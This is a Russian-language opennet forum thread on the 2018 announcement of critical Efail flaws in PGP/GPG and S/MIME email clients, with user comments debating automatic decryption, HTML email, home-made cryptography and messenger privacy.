Вариант для распечатки		Пред. тема | След. тема
Форум Разговоры, обсуждение новостей
Изначальное сообщение		[ Отслеживать ]

"Критическая уязвимость в системах шифрования email на основе..."	+/–
Сообщение от opennews (?), 14-Май-18, 11:03
Себастьян Шинцель (Sebastian Schinzel (https://sebastian-schinzel.de/)), авторитетный немецкий эксперт по компьютерной безопасности (один из авторов атаки DROWN (https://www.opennet.me/opennews/art.shtml?num=43971)), предупредил (https://twitter.com/seecurity/status/995906576170053633) о выявлении критических уязвимостей в системах шифрования почтовой переписки, основанных на  использовании PGP/GPG и S/MIME. Проблемы позволяют определить исходный открытый текст шифрованных писем, в том числе отправленных ранее зашифрованных писем. В настоящее время доступно лишь общее предупреждение, детали будут раскрыты 15 мая в 7 утра (UTC). Правозащитная организация Electronic Frontier Foundation (EFF) подтвердила (https://www.eff.org/deeplinks/2018/05/attention-pgp-users-ne...), что выявленные уязвимости относятся к разряду наиболее критических проблем и представляют серьёзных риск для пользователей шифрованных коммуникаций по электронной почте, особенно так как проблемы позволяют получить доступ к содержимому ранее отправленных зашифрованных сообщений. Судя по отрывочным сведениям, уязвимости напрямую не затрагивают PGP/GPG и S/MIME, а проявляются в конечных решениях на базе данных систем для почтовых клиентов из-за функций автоматической расшифровки. Утверждается, что надёжно работающих исправлений проблем пока не существует, поэтому пользователям PGP/GPG и S/MIME предлагается отключить в почтовых клиентах инструменты, поддерживающие автоматическую расшифровку сообщений. До формирования исправлений пользователям предлагается временно прекратить использование PGP для отправки и приёма писем и воспользоваться альтернативными каналами  обмена шифрованными сообщениями, такими как Signal. Инструкции по отключению PGP/GPG и S/MIME подготовлены для Thunderbird с Enigmail (https://www.eff.org/deeplinks/2018/05/disabling-pgp-thunderb...), Apple Mail c GPGTools (https://www.eff.org/deeplinks/2018/05/disabling-pgp-apple-ma...) и Outlook c Gpg4win (https://www.eff.org/deeplinks/2018/05/disabling-pgp-outlook-...). URL: https://www.eff.org/deeplinks/2018/05/attention-pgp-users-ne... Новость: https://www.opennet.me/opennews/art.shtml?num=48596
Ответить | Правка | Cообщить модератору

Сообщения

[Сортировка по ответам | RSS]

1. Сообщение от Онвоним (?), 14-Май-18, 11:03	+/–
Зачем альтернативные каналы и signal? Просто отключить автоматическую расшифровку, и делать это руками.
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #5

2. Сообщение от лютый охохонюшка (?), 14-Май-18, 11:05	–10 +/–
А ведь неломаемое шифрование изобрели ещё при царе Горохе, одноразовые шифр-блокноты называется. В наши времена дешевого стораджа вообще халявка, сгенерил 4ГБ рэндома и хватит на всю жизнь + на аудиоразговоры.
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #4, #6, #105

3. Сообщение от Креативные инноваторы (?), 14-Май-18, 11:06	+8 +/–
Настало время создавать логотип, логотип сам себя не создаст.
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #11, #73

4. Сообщение от Кир (?), 14-Май-18, 11:07	+3 +/–
... и наградил всех счастливых потенциальных корреспондентов гигабайтами мусора ...
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #2

5. Сообщение от Онанимус (?), 14-Май-18, 11:08	+2 +/–
Таки да! Тем более не понятна связь между автоматической расшифровкой и уязвимостью зашифровки.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #1 Ответы: #10

6. Сообщение от Креативные инноваторы (?), 14-Май-18, 11:08	+13 +/–
повод съездить друг к другу в гости, да
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #2

7. Сообщение от Аноним (-), 14-Май-18, 11:23	+3 +/–
https://lists.gnupg.org/pipermail/gnupg-users/2018-May/06031...
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #32

8. Сообщение от Онаним (?), 14-Май-18, 11:27	–10 +/–
В очередной раз убеждаюсь: хочешь сделать хорошо - сделай это сам. Систему шифрования для своего бизнеса - изучи вопрос, и пиши сам.
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #9, #16, #65

9. Сообщение от sabakka (?), 14-Май-18, 11:32	+17 +/–
люди годами не могут сделать, онаним запилит все за пару недель.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #8 Ответы: #12

10. Сообщение от Онвоним (?), 14-Май-18, 11:34	+/–
Я предполагаю, что уязвимость - это сохранение почтовым клиентом исходного незашифрованного сообщения перед отправкой в черновиках. Черновик в исходном виде может передаваться серверу. И если история переписки в черновиках хранятся на почтовом сервере - то можно восстанавливать оригиналы. Клиент может периодически сохранять черновик ещё не отправленного письма. Наблюдал такое, но пока со связкой K-9 (с OpenKeychain). Но то Android. Соответственно, шифруем сообщение, кладём armored-текст в письмо, и расшифровываем в обратном порядке при получении.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #5 Ответы: #31

11. Сообщение от Andrey Mitrofanov (?), 14-Май-18, 11:36	–2 +/–
> Настало время создавать логотип, логотип сам себя не создаст. Дыкыть анонса-то не было ещё.  Это слухи-утечки, подогревающие интерес покупателей к.  До 15-го заинтересованные микрософты подгонят ребятам денежек и на логотип, и на погоняло креатифное, и на титульный сайт в зоне .com (.cypher? .bug? .info?  .app!??  --  где по-взрослому-то? чтоб подороже!). Ща, погодь, всё будет. +++!"простые ошибки в СПО" & "получают имена собственные, эмблемы и пр." http://www.opennet.me/openforum/vsluhforumID3/105391.html#15
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #3 Ответы: #13, #15, #18

12. Сообщение от Аноним (-), 14-Май-18, 11:36	+/–
делается ставка на неуловимого Джо
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #9

13. Сообщение от Аноним (-), 14-Май-18, 11:37	+1 +/–
по итогам, новость выеденного яйца не стоит
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #11

14. Сообщение от Andrew (??), 14-Май-18, 11:37	–7 +/–
99% пользователей имеют очень отдаленное представление о механизмах безопасности электронной почты, тем более, что речь идет о шифровании всего сообщения, а не только прикрепленных файлов. если OpenPGP еще кто-то использует, то S/MIME вообще для многих неведома зверушка. так что оба стандарта могут быть кривыми и косыми, никого это не коснется. и вообще хороший повод задуматься о том, что электронная почта это ископаемое из 70-80х годов 20 века, которое давно не отвечает современным требованиям.
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #17

15. Сообщение от Andrey Mitrofanov (?), 14-Май-18, 11:40	+/–
> и на погоняло креатифное, " Проблемам присвоено имя Efail. " Я прочитал наверху, да.  //IMNSHO лучше б денег подождали -- чего покреативнее приду ^W купили б.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #11

16. Сообщение от pull request (?), 14-Май-18, 11:42	+15 +/–
Первое правило криптографии - никогда не придумывай свою систему криптографии.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #8 Ответы: #23, #27, #34, #39, #48, #135

17. Сообщение от Аноним (-), 14-Май-18, 11:43	+1 +/–
Ископаемое, согласен. Но что на замену?
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #14 Ответы: #20, #21, #22, #24, #26

18. Сообщение от Аноним (-), 14-Май-18, 11:43	–1 +/–
cTLD .apple ещё не занята ... Эппл её хрен отсудит, так как можно сказать, что она для продавцов и культиваторов яблоневых саженцев, но зато они могут её заблочить в гейфонах.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #11

19. Сообщение от Нанобот (ok), 14-Май-18, 11:52	–1 +/–
>среди исследователей, которые входят в команду, выявившую уязвимость, в основном представлены эксперты, специализирующиеся на криптографических алгоритмах не беда, сейчас эксперты опеннета разберут все остальные малоизученные области и выдадут своё экспертное заключение 😂
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #35

20. Сообщение от Аноним (-), 14-Май-18, 11:52	–6 +/–
очевидный телеграм очевиден
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #17 Ответы: #25

21. Сообщение от Аноним (-), 14-Май-18, 11:53	–3 +/–
Телеграм.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #17 Ответы: #43, #59

22. Сообщение от Вещества (?), 14-Май-18, 11:54	+1 +/–
жаббер с omemo
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #17

23. Сообщение от Ivan_83 (ok), 14-Май-18, 11:54	+/–
забыл авторство АНБ указать :)
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #16 Ответы: #104

24. Сообщение от Аноним (-), 14-Май-18, 11:56	+/–
DIME Ладара Левисона?
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #17

25. Сообщение от Ivan_83 (ok), 14-Май-18, 11:56	+/–
телеграм и сигнал пусть идут по дальше, такие проекты ущемляющие свободы пользователей и их приватность.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #20 Ответы: #28, #29, #30

26. Сообщение от 1 (??), 14-Май-18, 11:56	+/–
хипстерский телеграмчик. А по делу. Почта на бумаге - это 19 век (если не раньше) но всё как-то не избавиться.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #17

27. Сообщение от Аноним (-), 14-Май-18, 11:56	+3 +/–
С этим правилом никакой криптографии бы не было.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #16 Ответы: #36, #45, #66

28. Сообщение от Аноним (-), 14-Май-18, 11:57	–10 +/–
> телеграм и сигнал пусть идут по дальше, такие проекты ущемляющие свободы пользователей > и их приватность. Сигнал да, но телеграм борется за свободы пользователей и их приватность.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #25 Ответы: #33, #57

29. Сообщение от Аноним (-), 14-Май-18, 11:58	+/–
> телеграм и сигнал пусть идут по дальше, такие проекты ущемляющие свободы пользователей > и их приватность. как будто днс, который использует емейлом, не является таковым. Только почтовые голуби с одноразовыми блокнотами спасут отца Русской Приватности.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #25 Ответы: #37, #102

30. Сообщение от Аноним (-), 14-Май-18, 12:02	+/–
Ring, Tox
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #25

31. Сообщение от Онанимус (?), 14-Май-18, 12:08	+/–
> Я предполагаю, что уязвимость - это сохранение почтовым клиентом исходного незашифрованного сообщения перед отправкой в черновиках. IMAP? Но в таком случае, уязвим трафик до IMAP сервера. Дальше то письмо идет шифрованное. А в анонсе говорится о глобальной уязвимости.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #10

32. Сообщение от Andrey Mitrofanov (?), 14-Май-18, 12:08	+1 +/–
> https://lists.gnupg.org/pipermail/gnupg-users/2018-May/06031... Акхр... "HTML mails" + "автоматическое [рас]шифровывание". Расходимся, пацаны! --- Сегодня в нашем сикьюритэ циркусе: ?Те, кто меняют безопасность на удобство, не получат ни того ни другого.? ?Удобная "безопасность" небезопасна.  Неудобная тоже.  Проверенная -- не факт.  Проверенная лично -- безопасна, может быть.  Проверенная лично, ежедневно и ${нужное-неизвестное вписать!} -- весьма вероятно, но недолго.?
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #7 Ответы: #103

33. Сообщение от Вы забыли заполнить поле Name (?), 14-Май-18, 12:12	+11 +/–
Насмешил. Дуруов и Ко борются за свои денюшки и делают пиар для таких как ты.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #28 Ответы: #38

34. Сообщение от Andrey Mitrofanov (?), 14-Май-18, 12:23	+/–
> Первое правило криптографии - никогда не придумывай свою систему криптографии. " If you think technology can solve your security problems, then you don't understand the problems and you don't understand the technology. " --Bruce Schneier " Anyone, from the most clueless amateur to the best cryptographer, can create an algorithm that he himself can't break. " --Bruce Schneier " The user's going to pick dancing pigs over security every time. " --Bruce Schneier //https://duckduckgo.com/?q=Bruce+Schneier+cryptograpy+securit...
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #16

35. Сообщение от Andrey Mitrofanov (?), 14-Май-18, 12:32	+1 +/–
>>среди исследователей, которые входят в команду, выявившую уязвимость, в основном представлены эксперты, специализирующиеся на криптографических алгоритмах > не беда, сейчас эксперты опеннета разберут все остальные малоизученные области и выдадут > своё экспертное заключение 😂 Особенно глубока и хорошо проработана экспертиза заключений эксертов по экспертизе областей опенета в области экспертизы.  О да, коллега, безусловно! Но надо идти глубже++   //https://duckduckgo.com/?q=need+to+go+deeper&t=ffnt&iax=image...
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #19

36. Сообщение от Andrey Mitrofanov (?), 14-Май-18, 12:33	+/–
>никакой криптографии бы не Никакой фантазии у людей.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #27 Ответы: #124

37. Сообщение от Andrey Mitrofanov (?), 14-Май-18, 12:38	+/–
>днс, который использует емейлом, не Deeper, bro! https://gnunet.org/gns / https://duckduckgo.com/?q=gnunet+dns /https://duckduckgo.com/?q=dht+dns /... //... ...
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #29

38. Сообщение от Crazy Alex (ok), 14-Май-18, 12:47	–1 +/–
Насколько я понимаю, у них одно другому не мешает - но это пока противоречия нет. Ну и свободы и приватность - тоже разные вещи. Вон, Эппл довольно агрессивно защищает приватность (а перед ним блекберри долго держался) - но свободы там ни капли.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #33 Ответы: #46, #58

39. Сообщение от pkdr (ok), 14-Май-18, 12:48	–1 +/–
Если бы так думали все, то до сих пор бы шифровали решётками, как у Жюля Верна или человечками, как у Конан Дойла.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #16

40. Сообщение от Annoynymous (ok), 14-Май-18, 12:49	+/–
Мы нашли уязвимость, но мы вам её не покажем, не расскажем и вообще, о чём новость?
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #44

41. Сообщение от Аноним (-), 14-Май-18, 12:52	–2 +/–
А какое шифрование используется в почте safe-mail.net и tutanota?
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #42, #85, #93

42. Сообщение от Аноним (-), 14-Май-18, 12:54	–1 +/–
Никакое.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #41

43. Сообщение от Аноним (-), 14-Май-18, 12:56	+1 +/–
Кто бы объяснил: на фига телеграм привязан к телефонному номеру?
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #21 Ответы: #49, #52, #111

44. Сообщение от Ordu (ok), 14-Май-18, 13:01	+1 +/–
О том, что у тебя есть время до завтра подумать и хоть как-то среагировать на грядущее раскрытие уязвимости.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #40 Ответы: #53, #60

45. Сообщение от rshadow (ok), 14-Май-18, 13:10	+/–
Итальянская забастовка: делать все _абсолютно в точности_ написанным правилам.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #27

46. Сообщение от rshadow (ok), 14-Май-18, 13:13	+1 +/–
> у них одно другому не мешает Так себе утверждение. Пиарили-то серетные чаты, которыми никто не пользуется. А оказалось все как всегда.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #38 Ответы: #47, #76

47. Сообщение от Аноним (-), 14-Май-18, 13:23	+/–
Говори только за себя.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #46 Ответы: #50

48. Сообщение от unxed (?), 14-Май-18, 13:26	+/–
А вот использовать индустриальный стандарт одновременно со своей криптографией это правило не запрещает. Или запрещает? Больше бдительности! Недостаточно паранойи! А вообще страшилки про дыры АНБ в алгоритмах как-то не сходятся с тем, что биткойны на тех же алгоритмах вполне надёжно крутятся, и никакие бывшие сотрудники АНБ на дырах не обогащаются. Или обогащаются, потихоньку списывая с кошельков, по которым годами не было транзакций? ;-)
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #16 Ответы: #62

49. Сообщение от Аноним (-), 14-Май-18, 13:30	–1 +/–
чтобы монетизировать сервис
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #43 Ответы: #55

50. Сообщение от unxed (?), 14-Май-18, 13:33	+/–
Наличие секретных чатов при доступности не секретных само по себе свидетельство в пользу того, что человеку есть что скрывать. Гранты за уязвимости в алгоритмах доказывают только то, что уязвимости стоят дороже этих грантов. Если я, условный телеграм-барыга, знаю, что взятка ментам дешевле уязимости (использование которой одноразово), я могу спать спокойно. Но в сравнении с теми же биткойнами, надёжность которых подтверждена кругленькими хранимыми суммами, гранты Дурова выглядят смешно.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #47 Ответы: #51

51. Сообщение от Аноним (-), 14-Май-18, 13:48	+/–
Эти ваши бетховены никем не признанные фантики.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #50 Ответы: #129

52. Сообщение от Аноним (-), 14-Май-18, 13:50	–1 +/–
Кто бы объяснил: на фига опеннет привязан к почтовому ящику?
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #43 Ответы: #63

53. Сообщение от Andrey Mitrofanov (?), 14-Май-18, 13:52	+/–
> О том, что у тебя есть время до завтра подумать и хоть > как-то среагировать на грядущее раскрытие уязвимости. Все писатели шифрованных HTML-писем соберут чемоданы, бросят квартиру(-ы), машины, дачи, яхты и... успеют улететь у Дурову во ...Вьетнам? ...Амстердам? ...Лондон или куда-там??? А нет ли тут ушей главного борца с коррупцией в э ^W одной стране!? ...или я слегка переоцениваю угрозы от нашей прокуратуры....
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #44 Ответы: #89

54. Сообщение от Аноним (-), 14-Май-18, 13:54	+/–
> Судя по всему, проблема связана с тем, что HTML может использоваться как канал для подстановки в письма заранее известных меток (oracle), например, через манипуляции с тегом "img". Интересно как это отразиться на каком-нибудь Mutt.
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #69

55. Сообщение от Аноним (-), 14-Май-18, 14:03	+/–
> чтобы монетизировать сервис Каким образом?
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #49

56. Сообщение от Аноним (-), 14-Май-18, 14:07	+/–
Пока вы тут комментите, уже подробности опубликовали: https://efail.de/
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #71

57. Сообщение от Ivan_83 (ok), 14-Май-18, 14:22	+3 +/–
Любой централизованный месенгер никогда не даст никаких свобод, пользователь для владельцев таких систем всегда товар/ресурс, который используется для извлечения выгоды. К владельцам таких систем всегда будут приходить люди с полномочиями и получать всё что им нужно. Это неизбежно, это всё заложено сразу в систему, кто бы что там не декларировал. Даже если месенгер типа е2е то он всегда знает кто с кем когда и сколько переписывался, это уже слишком много. Борьба телеги - это сплошной пеар, они всегда так на халяву пеарились, с самого начала. Если бы им реально было интересно свобода и приватность - они бы превратились в аналог токса, а пока они привязаны к мобиле и своим серверам - грош им цена.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #28 Ответы: #79

58. Сообщение от Ivan_83 (ok), 14-Май-18, 14:25	+2 +/–
Огрызок интенсивно пеарится, как и все американские сервисы. Их цель - создать видимость что они не сотрудничают и не сливают данные хомяков в АНБ, но я этому никогда не поверю, потому что АНБ гарантирует им жирные гос контракты и крышу, есть там и просто патриоты на уровне нашей ваты.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #38 Ответы: #75

59. Сообщение от Ivan_83 (ok), 14-Май-18, 14:28	+1 +/–
ггг как вам мозги то промыли. Телега от аськи и мыло агента отличается только в худьшую сторону, ибо аська с агентом изначально мобилу не требовали и их можно было юзать не имея/не светя свой номер.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #21

60. Сообщение от Аноним (-), 14-Май-18, 14:33	+/–
Уже нету https://efail.de/
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #44 Ответы: #61

61. Сообщение от Andrey Mitrofanov (?), 14-Май-18, 14:37	+/–
> Уже нету > https://efail.de/ Ждём посадок.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #60 Ответы: #68

62. Сообщение от Аноним84701 (ok), 14-Май-18, 14:53	–1 +/–
> А вообще страшилки про дыры АНБ в алгоритмах как-то не сходятся с тем, что биткойны на тех же алгоритмах вполне надёжно крутятся, и никакие бывшие сотрудники АНБ на дырах не обогащаются. Все верно, ведь все-все дыры во всех-всех алгоритмах (причем сразу со сплойтами и прочим) доступны  каждому сотруднику, без подписи десятка бумажек и обещания ана^W различных кар в случае утечки …
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #48 Ответы: #72

63. Сообщение от Аноним (-), 14-Май-18, 14:55	+/–
"Гениальное" сравнение, молодец
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #52 Ответы: #64, #67

64. Сообщение от Аноним (-), 14-Май-18, 14:59	–1 +/–
Ты считаешь есть разница?
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #63 Ответы: #90

65. Сообщение от Ан (??), 14-Май-18, 15:07	+1 +/–
Боюсь, на бизнесс времени не останется =) А если все и получится, то придут вежливые люди и попросят изменить алгоритм на гост и попутно отдать ключи
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #8

66. Сообщение от Аноним (-), 14-Май-18, 15:07	+/–
Именно поэтому правила криптографии появились уже после появления криптографии.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #27

67. Сообщение от Аноним (-), 14-Май-18, 15:18	+/–
Hacke Nnews вообще-то прекрасно обходится без почты
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #63 Ответы: #78

68. Сообщение от Ураган (?), 14-Май-18, 15:24	–1 +/–
На бутыль?
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #61

69. Сообщение от alex53 (ok), 14-Май-18, 16:37	+/–
На mutt сам по себе - никак. Проблемы будут только если для написания писем будет использоваться html редактор.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #54 Ответы: #119

70. Сообщение от Аноним (70), 14-Май-18, 16:38	+/–
Ну дык дырявые клиенты, дырявый HTML, а не сами GPG и GPG4win. Ручками вставлять и проверять, ручками. Развели тут панику.
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #77

71. Сообщение от annual slayer (?), 14-Май-18, 16:41	+/–
с логотипом уже, кстати ;)
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #56

72. Сообщение от kk (??), 14-Май-18, 17:01	+3 +/–
анальные карты очень наверное страшны когда на кону тысячи биткоинов ну что вы в самом деле
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #62 Ответы: #74, #113

73. Сообщение от Вареник (?), 14-Май-18, 17:11	+/–
И озаботиться рассово-половым составом команды разрабов.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #3

74. Сообщение от Аноним84701 (ok), 14-Май-18, 17:13	+/–
> анальные карты очень наверное страшны когда на кону тысячи биткоинов ну что вы в самом деле Зато обосновывать отсутствие дыр в алгоритмах тем, что бывшие сотрудники АНБ не попались на уводе биткоинов совсем не "в самом деле"? Если исходить из шпионских рома^W^W логики, то доступ к таким вещам всегда будет у довольно ограниченного количества людей. И в особо сильную текучку кадров и наличие кучи откровенных дураков там как-то не сильно верится.   В свою очередь, в этом случае эти бывшие сотрудники вполне себе осознают возможности родной  конторы (и того, что вычисляются они, скорее всего, только влет). А там все равно биткоины отберут и в места не столь отдаленные отправят. Ну или они просто не попадаются, да -- доказать это вы тоже не можете ;)
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #72

75. Сообщение от Crazy Alex (ok), 14-Май-18, 17:20	+/–
Кто там что им гарантирует - это уже фантазии пошли. Не то, чтобы этого быть не могло, но на аргумент не тянет. А вот противоположные примеры вполне известны. Ну а пиарятся абсолютно все вменяемые организации - хоть коммерческие, хоть за идэю. Кто не пиарится - тот дохнет :-)
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #58 Ответы: #91

76. Сообщение от Crazy Alex (ok), 14-Май-18, 17:28	+/–
Нормальное утверждение. Получать прибыль с пользовательской базы не обязательно рекламой или продажей личной информации, можно и поинтереснее штуки придумать. Дуров в этом плане придумал вполне неплохо. Продают они сейчас TON - свою (будущую) крипту. Ежу ясно, что у них и достаточно ресурсов, чтобы эту штуку сделать и достаточная пользовательская база, её хорошо раскрутить, если она будет хотя бы не хуже прочих. И получить МНОГО - сравнимо с eth, пожалуй. В миллиардах, сотнях миллионов как минимум. При этом морочить голову со слежкой и подобным банально смысла нет - не окупится. Поэтому полагаю, что пока им таки выгодна приватность пользователей. Что будет дальше - а там будет видно. По идее надёжность их штуковины будет и в дальнейшем её плюсом. Плюс Дуров - вполне известный либертарианец.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #46 Ответы: #80

77. Сообщение от Аноним (-), 14-Май-18, 17:35	–2 +/–
Думаешь в самом GPG нет дыр? Верить в идеальность софта в 2018?
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #70

78. Сообщение от arisu (ok), 14-Май-18, 17:36	+/–
> Hacke Nnews вообще-то прекрасно обходится без почты а ты, конечно, чтобы написать этот комментарий, был просто вынужден ввести свой почтовый адрес.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #67 Ответы: #88, #106

79. Сообщение от Crazy Alex (ok), 14-Май-18, 17:37	+/–
Ну я вот не представляю, как можно сделать надёжный, удобный и не особо жручий P2P-сервис для "простых людей" с достаточным количеством модных плюшек. И живых примеров тоже не видать. Скорее вссего, будет как везде - на одном конце шкалы "секьюрно, неудобно и для понимающих", на другом "несекьюрно, зато с плюшками и для любой блондинки". В этом плане телеграм занял довольно вменяемую промежуточную позицию - и просто, и достаточно безопасно, чтобы той же наркотой там торговали. А насчёт " всегда знает кто с кем когда и сколько переписывался, это уже слишком много" - это, в общем-то, вопрос личных предпочтений. Можно с тем же SSL сравнить - гарантирует безопасность? Нет. Но прилично удорожает атаку и защищает от всяких мелких "умников" - от тупого снифа до обнаглевшего ОПСОСа, пытающегося рекламу пихать. А насчёт "всегда ресурс" - я там выше отвечал. Ресурс - это одно, как именно его использовать - другое.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #57 Ответы: #82, #94

80. Сообщение от Andrey Mitrofanov (?), 14-Май-18, 17:41	+1 +/–
>При этом морочить голову со слежкой и > подобным банально смысла нет - не окупится. Поэтому полагаю, что пока > им таки выгодна приватность пользователей. Морочить голову надо _отсутствием_ слежки, _гарантированным_ отсутствием на уровне математики, а не то, что Вы написали...
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #76 Ответы: #81, #84

81. Сообщение от Andrey Mitrofanov (?), 14-Май-18, 17:44	+/–
>_гарантированным_ отсутствием на уровне математики, Ещё неплохо заморочиться _гарантированным_ {из,у}беганием {,от} угроз на уровне государств, айбиэмов-фейсбуков-микросовтов и рептилоидов... > а не то, что Вы написали...
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #80

82. Сообщение от arisu (ok), 14-Май-18, 17:45	+/–
потому что не надо ничего такого делать для «простых людей». если человек не понимает, что безопасность не может работать без его участия и понимания — он всегда найдёт способ обойти все меры безопасности и облажаться. а любая попытка сделать меры «менее обходимыми» заранее обречена: неудобно будет *всем*. зато продавать (в том или ином виде, лучше всего неявно) «простым людям» «готовые решения для безопасности» — отличный лохотрон. ради чего, собственно, весь хайп с «безопасностью» и раскручивали.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #79 Ответы: #83

83. Сообщение от Crazy Alex (ok), 14-Май-18, 17:50	+/–
Ну я ж даже примеры привёл с SSL и наркотой - оно вполне прилично защищает от примитивных угроз или атак с малыми ресурсами. Которых, в общем-то, большинство. Можно даже обнаглеть и сказать, что для того, кому нет нужды в безопасности разбираться, других угроз и не бывает.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #82 Ответы: #86

84. Сообщение от Crazy Alex (ok), 14-Май-18, 17:59	+/–
Кому-то надо, а кому-то и нет. Что за манера решать за других, что им нужно (и чем они за это должны платить)? Допустим, если я с кем-то договариваюсь купить пару биткоинов за (вполне легально полученный) кэш мне хотелось бы, чтобы местный криминал это не узнал с понятными последствими. А вот узнает об этом Дуров или нет - мне побоку, так как крайне сомнительно, чтобы он с местной гопотой сотрудничал. Если барышня высылает кому-то свои фоточки ню - она, вероятно, не хочет, чтобы они попали в общий доступ, но, опять же, АНБ для неё вряд ли представляет опасность. В будущем может проявить интерес, конечно, но вероятность исчезающе мала. Когда муж пишет жене, забывшей ключ "запасной лежит под третьей справа черепицей от курятника" - та же ситуация. А такой бытовухи - абсолютное большинство.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #80

85. Сообщение от Darth Vader (?), 14-Май-18, 18:03	+1 +/–
Use Protonmail, Luke!
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #41 Ответы: #87

86. Сообщение от arisu (ok), 14-Май-18, 18:09	+/–
для того, от чего «защищает» ssl — он сильно переусложнён. а мелкие наркоторговцы просто никому нафиг не нужны, для них (грубо говоря) и rot13 пойдёт: всем лень. а когда не лень, то отлично берут мозолистой рукой — как раз из-за того, что эти торговцы совершенно не умеют в безопасность. хуже того: не просто не умеют, а считают, что они в безопасности, потому что применяют «безопасные решения». профанация безопасности (утверждение, что нечто «безопасно», хотя оно не) — это очень, очень плохо. потому что делает внедрение нормальной безопасности сложным почти до невозможности. пользователь *не* *понимет*, и «аргументирует» примерно так: «да что ты мне тут рассказываешь! сами XYZ говорят, что у них всё безопасно! а у них милионные обороты, они точно в этом понимают больше, чем ты!» криптографов такие люди читать не станут (иначе они бы *уже* прочитали), и понимать аргументы не могут в силу необразованости. в итоге внедрение «немножко безопасных» вещей ХУЖЕ, чем полный отказ от них.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #83 Ответы: #92

87. Сообщение от Аноним (-), 14-Май-18, 18:10	+/–
Они хохлам всё сливали. Не вариант.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #85 Ответы: #112

88. Сообщение от Аноним (-), 14-Май-18, 18:14	+/–
Мы тебе про регистрацию, а ты про комментарий.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #78

89. Сообщение от Ordu (ok), 14-Май-18, 18:16	+/–
> Все писатели шифрованных HTML-писем соберут чемоданы, бросят квартиру(-ы), машины, дачи, яхты и... успеют улететь у Дурову во ...Вьетнам? ...Амстердам? ...Лондон или куда-там??? Нет, там же написано, что судя по всему будет достаточно срочно сменить email-клиент на что-нибудь, что не умеет в html, отображая его текстом.
